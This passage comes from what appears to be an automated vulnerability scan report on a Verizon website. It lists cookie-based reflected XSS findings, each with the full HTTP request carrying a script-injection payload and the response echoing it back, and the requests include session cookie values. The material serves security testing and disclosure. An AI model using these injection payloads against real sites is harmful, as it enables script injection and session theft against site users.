Cookie: Source=CHSI; vzapps=STATE=TX77bd6'><script>alert(1)</script>866fecce315; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 113390
Expires: Sat, 20 Nov 2010 00:09:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:44 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX77bd6'><script>alert(1)</script>866fecce315; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | FiOS Internet: FAQs
</title><meta name="keywords" content="FiOS Internet FAQs, fios faqs, verizon fios faqs, fios details, fios informatio
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX77BD6'><SCRIPT>ALERT(1)</SCRIPT>866FECCE315 ' />
...[SNIP]...

2.882. http://www22.verizon.com/Residential/FiOSInternet/Features/Features.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/Features/Features.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 78bda'><script>alert(1)</script>c540e06163e was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX78bda'><script>alert(1)</script>c540e06163e; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 75663
Expires: Sat, 20 Nov 2010 00:11:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:57 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:57 GMT; path=/
Set-Cookie: ContextInfo_State=TX78bda'><script>alert(1)</script>c540e06163e; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:57 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:57 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:57 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

<script type="text/javasc
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX78BDA'><SCRIPT>ALERT(1)</SCRIPT>C540E06163E ' />
...[SNIP]...

2.883. http://www22.verizon.com/Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e17ad'><script>alert(1)</script>33b4d098683 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXe17ad'><script>alert(1)</script>33b4d098683; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119104
Expires: Sat, 20 Nov 2010 00:14:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:14:04 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:03 GMT; path=/
Set-Cookie: ContextInfo_State=TXe17ad'><script>alert(1)</script>33b4d098683; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:03 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:03 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:03 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXE17AD'><SCRIPT>ALERT(1)</SCRIPT>33B4D098683 ' />
...[SNIP]...

2.884. http://www22.verizon.com/Residential/FiOSInternet/Installation/Installation.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/Installation/Installation.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8d1de'><script>alert(1)</script>c5602c17654 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX8d1de'><script>alert(1)</script>c5602c17654; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119136
Expires: Sat, 20 Nov 2010 00:13:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:49 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:49 GMT; path=/
Set-Cookie: ContextInfo_State=TX8d1de'><script>alert(1)</script>c5602c17654; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:49 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:49 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:49 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX8D1DE'><SCRIPT>ALERT(1)</SCRIPT>C5602C17654 ' />
...[SNIP]...

2.885. http://www22.verizon.com/Residential/FiOSInternet/Overview.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/Overview.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ee786'><script>alert(1)</script>78ce639b9c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXee786'><script>alert(1)</script>78ce639b9c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119134
Expires: Sat, 20 Nov 2010 00:12:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:41 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:41 GMT; path=/
Set-Cookie: ContextInfo_State=TXee786'><script>alert(1)</script>78ce639b9c; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:41 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:41 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:41 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXEE786'><SCRIPT>ALERT(1)</SCRIPT>78CE639B9C ' />
...[SNIP]...

2.886. http://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/Plans/Plans.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c469d'><script>alert(1)</script>c411bde7de8 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXc469d'><script>alert(1)</script>c411bde7de8; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 148894
Expires: Sat, 20 Nov 2010 00:11:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:52 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXC469D'><SCRIPT>ALERT(1)</SCRIPT>C411BDE7DE8 ' />
...[SNIP]...

2.887. http://www22.verizon.com/Residential/FiOSTV/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSTV/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f1c67'><script>alert(1)</script>03c78f6a0c8 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXf1c67'><script>alert(1)</script>03c78f6a0c8; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110632
Expires: Sat, 20 Nov 2010 03:28:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:28:20 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:28:20 GMT; path=/
Set-Cookie: ContextInfo_State=TXf1c67'><script>alert(1)</script>03c78f6a0c8; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:28:20 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:28:20 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:28:20 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXF1C67'><SCRIPT>ALERT(1)</SCRIPT>03C78F6A0C8 ' />
...[SNIP]...

2.888. http://www22.verizon.com/Residential/FiOSTV/ [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSTV/

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc4f0"-alert(1)-"1fba9dfb345 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/FiOSTV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=bc4f0"-alert(1)-"1fba9dfb345; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 116932
Expires: Sat, 20 Nov 2010 03:28:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:28:16 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:28:16 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:28:16 GMT; path=/
